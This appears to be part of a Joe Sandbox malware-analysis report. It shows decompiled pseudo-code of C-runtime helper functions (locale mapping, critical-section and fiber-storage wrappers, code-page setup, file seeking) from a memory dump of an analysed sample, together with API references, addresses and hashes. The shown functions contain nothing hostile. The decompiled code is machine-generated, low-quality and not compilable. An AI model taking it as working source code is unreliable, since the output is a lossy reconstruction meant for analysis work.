				_t18 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t18 ^ _t35;
				_t20 = E00A5AC98(0x16, "LCMapStringEx", 0xa679c4, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					_t22 = LCMapStringW(E00A5AFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xa63278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t33();
				}
				_pop(_t34);
				return E00A4FBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
			}

0x00a5af6c
0x00a5af6c
0x00a5af6c
0x00a5af71
0x00a5af72
0x00a5af79
0x00a5af8e
0x00a5af93
0x00a5af9a
0x00a5afdd
0x00a5af9c
0x00a5afb9
0x00a5afbf
0x00a5afbf
0x00a5afe8
0x00a5aff1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00A5AFDD

Strings

LCMapStringEx, xrefs: 00A5AF7D, 00A5AF87

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 44730317c8ba9388734f3595d96b95552aa91eebf695ff0302b18d809557663c
Instruction ID: 5949f6f4ea2154a087a8641c8de5dab711559f6879358a6913c0753bbc1506f9
Opcode Fuzzy Hash: 44730317c8ba9388734f3595d96b95552aa91eebf695ff0302b18d809557663c
Instruction Fuzzy Hash: F5010872604209BBCF029FA0DD06DEE7FB2FF18755F014654FE1466160CA728A36EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00A5AF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t14 = __ebx;
				_push(__ecx);
				_t8 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t8 ^ _t24;
				_t10 = E00A5AC98(0x14, "InitializeCriticalSectionEx", 0xa679a0, "InitializeCriticalSectionEx"); // executed
				_t22 = _t10;
				if(_t22 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xa63278(_a4, _a8, _a12);
					_t11 =  *_t22();
				}
				_pop(_t23);
				return E00A4FBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
			}

0x00a5af0a
0x00a5af0a
0x00a5af0f
0x00a5af10
0x00a5af17
0x00a5af2c
0x00a5af31
0x00a5af38
0x00a5af55
0x00a5af3a
0x00a5af45
0x00a5af4b
0x00a5af4b
0x00a5af60
0x00a5af69

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A5A56F), ref: 00A5AF55

Strings

InitializeCriticalSectionEx, xrefs: 00A5AF1B, 00A5AF25

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9817afb956ba0a50191c8454039cb50d0743709574645e12463ee11014390dca
Instruction ID: 457cf5d43c87b95a745005fa735397747c9f7f013d8f465477ae7d55fcad081d
Opcode Fuzzy Hash: 9817afb956ba0a50191c8454039cb50d0743709574645e12463ee11014390dca
Instruction Fuzzy Hash: C5F0E972645208BFCF069F94CD02CAD7FB1FF15B12B004554FC085A260DA715E169785

Uniqueness

Uniqueness Score: -1.00%

Function 00A5ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00A5ADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t10 = __ebx;
				_push(__ecx);
				_t4 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t4 ^ _t20;
				_t6 = E00A5AC98(3, "FlsAlloc", 0xa67938, "FlsAlloc"); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xa63278(_a4);
					_t7 =  *_t18();
				}
				_pop(_t19);
				return E00A4FBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}

0x00a5adaf
0x00a5adaf
0x00a5adb4
0x00a5adb5
0x00a5adbc
0x00a5add1
0x00a5add6
0x00a5addd
0x00a5adee
0x00a5addf
0x00a5ade4
0x00a5adea
0x00a5adea
0x00a5adf9
0x00a5ae02

APIs

TlsAlloc.KERNEL32 ref: 00A5ADEE

Strings

FlsAlloc, xrefs: 00A5ADC0, 00A5ADCA

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 3d703885bbb8a431a560a4bad4bd27ccdc192e59cc9ae44b65319c55b696bfae
Instruction ID: 1e4fdf57532631624345fc52431d0b2896ab3175e0702bc242d7b76b1bc04543
Opcode Fuzzy Hash: 3d703885bbb8a431a560a4bad4bd27ccdc192e59cc9ae44b65319c55b696bfae
Instruction Fuzzy Hash: 8BE0E5737552187BCB01EBA5DC02A6EBBB4EB65B22B010299FC0597280CDB05E0286D6

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BBF0 Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A5BBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t75;
				signed int _t78;
				signed char* _t79;
				short* _t80;
				int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t91 = __edi;
				_t48 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t48 ^ _t96;
				_t95 = _a8;
				_t75 = E00A5B7BB(__eflags, _a4);
				if(_t75 != 0) {
					_push(__edi);
					_t92 = 0;
					__eflags = 0;
					_t78 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xa6e978)) - _t75;
						if( *((intOrPtr*)(_t51 + 0xa6e978)) == _t75) {
							break;
						}
						_t78 = _t78 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t78;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t75 - 0xfde8;
							if(_t75 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t75 - 0xfde9;
								if(_t75 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t75,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xa926c4 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00A5B82E(_t95);
												goto L37;
											}
										} else {
											E00A4FFF0(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t75;
											 *(_t95 + 0x21c) = _t92;
											_t75 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t95 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t85 = _t71[1];
														__eflags = _t85;
														if(_t85 == 0) {
															goto L16;
														}
														_t89 = _t85 & 0x000000ff;
														_t86 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t86 - _t89;
															if(_t86 > _t89) {
																break;
															}
															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
															_t86 = _t86 + 1;
															__eflags = _t86;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t95 + 0x1a;
												_t84 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t84 = _t84 - 1;
													__eflags = _t84;
												} while (_t84 != 0);
												 *(_t95 + 0x21c) = E00A5B77D( *(_t95 + 4));
												 *(_t95 + 8) = _t75;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00A5B893(_t89, _t95); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t91);
						goto L39;
					}
					E00A4FFF0(_t92, _t95 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xa6e988;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t79 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t79[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t79 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xa6e970; // 0x8040201
										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t79[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t79 =  &(_t79[2]);
								__eflags =  *_t79;
								if( *_t79 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t75;
					 *(_t95 + 8) = 1;
					 *(_t95 + 0x21c) = E00A5B77D(_t75);
					_t80 = _t95 + 0xc;
					_t89 = _v36 + 0xa6e97c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t80 = _t58;
						_t80 = _t80 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00A5B82E(_t95);
					_t60 = 0;
				}
				L39:
				return E00A4FBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
			}

0x00a5bbf0
0x00a5bbf8
0x00a5bbff
0x00a5bc07
0x00a5bc0f
0x00a5bc14
0x00a5bc24
0x00a5bc25
0x00a5bc25
0x00a5bc27
0x00a5bc29
0x00a5bc2b
0x00a5bc2e
0x00a5bc2e
0x00a5bc34
0x00000000
0x00000000
0x00a5bc3a
0x00a5bc3b
0x00a5bc3e
0x00a5bc41
0x00a5bc46
0x00000000
0x00a5bc48
0x00a5bc48
0x00a5bc4e
0x00a5bd1c
0x00a5bd1c
0x00a5bc54
0x00a5bc54
0x00a5bc5a
0x00000000
0x00a5bc60
0x00a5bc64
0x00a5bc6a
0x00a5bc6c
0x00000000
0x00a5bc72
0x00a5bc77
0x00a5bc7d
0x00a5bc7f
0x00a5bd09
0x00a5bd0f
0x00000000
0x00a5bd11
0x00a5bd12
0x00000000
0x00a5bd12
0x00a5bc85
0x00a5bc8f
0x00a5bc94
0x00a5bc9c
0x00a5bca2
0x00a5bca3
0x00a5bca6
0x00a5bcf9
0x00a5bca8
0x00a5bca8
0x00a5bcac
0x00a5bcaf
0x00a5bcb1
0x00a5bcb1
0x00a5bcb4
0x00a5bcb6
0x00000000
0x00000000
0x00a5bcb8
0x00a5bcbb
0x00a5bcc6
0x00a5bcc6
0x00a5bcc8
0x00000000
0x00000000
0x00a5bcc0
0x00a5bcc5
0x00a5bcc5
0x00a5bcc5
0x00a5bcca
0x00a5bccd
0x00a5bcd0
0x00000000
0x00000000
0x00000000
0x00a5bcd0
0x00a5bcb1
0x00a5bcd2
0x00a5bcd2
0x00a5bcd5
0x00a5bcda
0x00a5bcda
0x00a5bcdd
0x00a5bcde
0x00a5bcde
0x00a5bcde
0x00a5bcee
0x00a5bcf4
0x00a5bcf4
0x00a5bd01
0x00a5bd02
0x00a5bd03
0x00a5bdc7
0x00a5bdc8
0x00a5bdcd
0x00a5bdce
0x00a5bdce
0x00a5bdce
0x00a5bc7f
0x00a5bc6c
0x00a5bc5a
0x00a5bc4e
0x00a5bdd0
0x00000000
0x00a5bdd0
0x00a5bd2e
0x00a5bd36
0x00a5bd36
0x00a5bd3a
0x00a5bd3d
0x00a5bd43
0x00a5bd46
0x00a5bd46
0x00a5bd49
0x00a5bd4b
0x00a5bd4d
0x00a5bd4d
0x00a5bd50
0x00a5bd52
0x00000000
0x00000000
0x00a5bd54
0x00a5bd57
0x00a5bd73
0x00a5bd73
0x00a5bd75
0x00000000
0x00000000
0x00a5bd5c
0x00a5bd62
0x00a5bd64
0x00a5bd6a
0x00a5bd6e
0x00a5bd6e
0x00a5bd6f
0x00000000
0x00a5bd6f
0x00000000
0x00a5bd62
0x00a5bd77
0x00a5bd7a
0x00a5bd7d
0x00000000
0x00000000
0x00000000
0x00a5bd7d
0x00a5bd7f
0x00a5bd7f
0x00a5bd82
0x00a5bd83
0x00a5bd86
0x00a5bd89
0x00a5bd89
0x00a5bd8f
0x00a5bd92
0x00a5bda1
0x00a5bdaa
0x00a5bdaf
0x00a5bdb5
0x00a5bdb6
0x00a5bdb6
0x00a5bdb9
0x00a5bdbc
0x00a5bdbf
0x00a5bdc2
0x00a5bdc2
0x00a5bdc2
0x00000000
0x00a5bc16
0x00a5bc17
0x00a5bc1d
0x00a5bc1d
0x00a5bdd1
0x00a5bde0

APIs

Part of subcall function 00A5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A5BA44,?), ref: 00A5B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A5BA89,?,00000000), ref: 00A5BC64
GetCPInfo.KERNEL32(00000000,00A5BA89,?,?,?,00A5BA89,?,00000000), ref: 00A5BC77

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 442a0d1dad5494bb688dfece761b28b6c4458e9277726b58ed796a5afdcf2a9e
Instruction ID: 7ff9952b4d0d32ed70c544ceb170f809909e3139633e6153b95d4d13079ecb50
Opcode Fuzzy Hash: 442a0d1dad5494bb688dfece761b28b6c4458e9277726b58ed796a5afdcf2a9e
Instruction Fuzzy Hash: 1C513476A102459FDB20CF75C8816BAFBF4FF45303F18446ED8968B262D735994ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A39A74 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00A39A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
				signed int _v0;
				long* _v4;
				intOrPtr _v8;
				void* _t30;
				long _t32;
				signed int _t33;
				void* _t35;
				long* _t38;
				void* _t41;
				long _t42;
				signed int _t46;
				long _t50;
				void* _t51;
				long _t52;
				intOrPtr* _t53;
				void* _t57;
				void* _t63;
				signed int _t67;
				signed int _t70;

				E00A4EC50(0x1018);
				_t50 = _a4132;
				_t42 = _a4128;
				_t53 = __ecx;
				_t52 = _a4124;
				_v0 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
					L21:
					_t30 = 1;
					L22:
					return _t30;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
					__eflags = _t42;
					if(__eflags > 0) {
						L32:
						_a12 = _t42;
						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
						__eflags = _t32 - 0xffffffff;
						if(_t32 != 0xffffffff) {
							goto L21;
						}
						_t33 = GetLastError();
						asm("sbb al, al");
						_t30 =  ~_t33 + 1;
						goto L22;
					}
					if(__eflags < 0) {
						L27:
						__eflags = _t50;
						if(_t50 == 0) {
							goto L32;
						}
						__eflags = _t50 - 1;
						if(_t50 != 1) {
							_t35 = E00A3981A(_t50);
						} else {
							 *0xa63278();
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
							_t53 = _v0;
						}
						_t52 = _t52 + _t35;
						asm("adc ebx, edx");
						_t50 = 0;
						__eflags = 0;
						goto L32;
					}
					__eflags = _t52;
					if(_t52 >= 0) {
						goto L32;
					}
					goto L27;
				}
				_t38 = __ecx + 0x28;
				_a4 = _t38;
				if(_t50 != 1) {
					__eflags = _t50;
					if(_t50 != 0) {
						L23:
						_t30 = 0;
						goto L22;
					}
					L5:
					_t63 = _t42 - _t38[1];
					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
						goto L23;
					} else {
						_t46 = _t42;
						_t57 = _t52 -  *_t38;
						asm("sbb ecx, [eax+0x4]");
						_a8 = _t46;
						if(_t57 != 0 || _t57 != 0) {
							do {
								_t67 = _t46;
								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
									L14:
									_t12 =  &_a20;
									 *_t12 = _a20 & 0x00000000;
									__eflags =  *_t12;
									_t51 = 0x1000;
									goto L15;
								} else {
									_t51 = _t57;
									_a20 = _t46;
									L15:
									 *0xa63278( &_a24, _t51);
									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
									if(_t41 <= 0) {
										goto L23;
									}
									_t46 = _v0;
									_t53 = _v8;
									asm("cdq");
									_t57 = _t57 - _t41;
									asm("sbb ecx, edx");
									_v0 = _t46;
									_t70 = _t46;
									if(_t70 > 0) {
										goto L14;
									}
								}
							} while (_t70 >= 0 && _t57 != 0);
							_t38 = _v4;
							goto L20;
						} else {
							L20:
							 *_t38 = _t52;
							_t38[1] = _t42;
							goto L21;
						}
					}
				}
				_t52 = _t52 +  *_t38;
				asm("adc ebx, [eax+0x4]");
				goto L5;
			}

0x00a39a79
0x00a39a7e
0x00a39a86
0x00a39a8f
0x00a39a92
0x00a39a99
0x00a39aa1
0x00a39b53
0x00a39b53
0x00a39b59
0x00a39b5f
0x00a39b5f
0x00a39aab
0x00a39b66
0x00a39b68
0x00a39b9d
0x00a39ba2
0x00a39bab
0x00a39bb1
0x00a39bb4
0x00000000
0x00000000
0x00a39bb6
0x00a39bbe
0x00a39bc0
0x00000000
0x00a39bc0
0x00a39b6a
0x00a39b70
0x00a39b70
0x00a39b72
0x00000000
0x00000000
0x00a39b74
0x00a39b77
0x00a39b92
0x00a39b79
0x00a39b80
0x00a39b8a
0x00a39b8c
0x00a39b8c
0x00a39b97
0x00a39b99
0x00a39b9b
0x00a39b9b
0x00000000
0x00a39b9b
0x00a39b6c
0x00a39b6e
0x00000000
0x00000000
0x00000000
0x00a39b6e
0x00a39ab1
0x00a39ab4
0x00a39abb
0x00a39ac4
0x00a39ac6
0x00a39b62
0x00a39b62
0x00000000
0x00a39b62
0x00a39acc
0x00a39acc
0x00a39acf
0x00000000
0x00a39adf
0x00a39ae1
0x00a39ae3
0x00a39ae5
0x00a39ae8
0x00a39aec
0x00a39af2
0x00a39af2
0x00a39af4
0x00a39b08
0x00a39b08
0x00a39b08
0x00a39b08
0x00a39b0d
0x00000000
0x00a39b00
0x00a39b00
0x00a39b02
0x00a39b12
0x00a39b1f
0x00a39b29
0x00a39b2d
0x00000000
0x00000000
0x00a39b2f
0x00a39b33
0x00a39b37
0x00a39b38
0x00a39b3a
0x00a39b3c
0x00a39b40
0x00a39b42
0x00000000
0x00000000
0x00a39b42
0x00a39b44
0x00a39b4a
0x00000000
0x00a39b4e
0x00a39b4e
0x00a39b4e
0x00a39b50
0x00000000
0x00a39b50
0x00a39aec
0x00a39acf
0x00a39abd
0x00a39abf
0x00000000

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00A39A50,?,?,00000000,?,?,00A38CBC,?), ref: 00A39BAB
GetLastError.KERNEL32(?,00000000,00A38411,-00009570,00000000,000007F3), ref: 00A39BB6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: dc493c22af013b94591d6c9caf9b2c1b55931e551625b3a83cd91df98576948a
Instruction ID: 20490c1d539713d317a8f8d3f7f3de3a04a7b7b813a670f1e7259eba3d054b37
Opcode Fuzzy Hash: dc493c22af013b94591d6c9caf9b2c1b55931e551625b3a83cd91df98576948a
Instruction Fuzzy Hash: C3419D71A043018BDB24DF25E58446BF7E5FBD8360F158A2DF89583260D7F0AD458A91

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BA27 Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A5BA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __ebp;
				char _t31;
				void* _t32;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_t68 = __edx;
				_v8 = E00A597E5(__ebx, __ecx, __edx);
				E00A5BB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
				_t31 = E00A5B7BB(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t32 = E00A58E06(_t57, 0x220); // executed
				_t70 = _t32;
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00A5BBF0(_t68, _t70, __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00A58B6F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xa6ec70;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xa6ec70) {
								E00A58DCC( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xa6eef0 & 0x00000001;
							if(( *0xa6eef0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00A5B691(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xa6ee90; // 0x871ec0
									 *0xa6e964 = _t44;
								}
							}
						}
						L6:
						E00A58DCC(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00A591A8())) = 0x16;
						goto L5;
					}
				}
			}

0x00a5ba27
0x00a5ba27
0x00a5ba34
0x00a5ba37
0x00a5ba3f
0x00a5ba48
0x00a5ba4b
0x00a5ba51
0x00000000
0x00a5ba53
0x00a5ba57
0x00a5ba58
0x00a5ba59
0x00a5ba5f
0x00a5ba64
0x00a5ba66
0x00a5ba6a
0x00a5ba6c
0x00a5ba9c
0x00a5ba9c
0x00000000
0x00a5ba6e
0x00a5ba7b
0x00a5ba81
0x00a5ba84
0x00a5ba89
0x00a5ba8d
0x00a5ba8f
0x00a5baae
0x00a5bab2
0x00a5bab4
0x00a5bab4
0x00a5babf
0x00a5bac3
0x00a5bac4
0x00a5bac6
0x00a5bac9
0x00a5bad0
0x00a5bad5
0x00a5bada
0x00a5bad0
0x00a5badb
0x00a5bae1
0x00a5bae6
0x00a5bae8
0x00a5baeb
0x00a5baee
0x00a5baf5
0x00a5baf7
0x00a5bafe
0x00a5bb03
0x00a5bb0c
0x00a5bb11
0x00a5bb17
0x00a5bb19
0x00a5bb1e
0x00a5bb1e
0x00a5bb17
0x00a5bafe
0x00a5ba9e
0x00a5ba9f
0x00000000
0x00a5ba91
0x00a5ba96
0x00000000
0x00a5ba96
0x00a5ba8f

APIs

Part of subcall function 00A597E5: GetLastError.KERNEL32(?,00A71098,00A54674,00A71098,?,?,00A540EF,?,?,00A71098), ref: 00A597E9
Part of subcall function 00A597E5: _free.LIBCMT ref: 00A5981C
Part of subcall function 00A597E5: SetLastError.KERNEL32(00000000,?,00A71098), ref: 00A5985D
Part of subcall function 00A597E5: _abort.LIBCMT ref: 00A59863

Part of subcall function 00A5BB4E: _abort.LIBCMT ref: 00A5BB80
Part of subcall function 00A5BB4E: _free.LIBCMT ref: 00A5BBB4

Part of subcall function 00A5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A5BA44,?), ref: 00A5B7E6

_free.LIBCMT ref: 00A5BA9F
_free.LIBCMT ref: 00A5BAD5

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

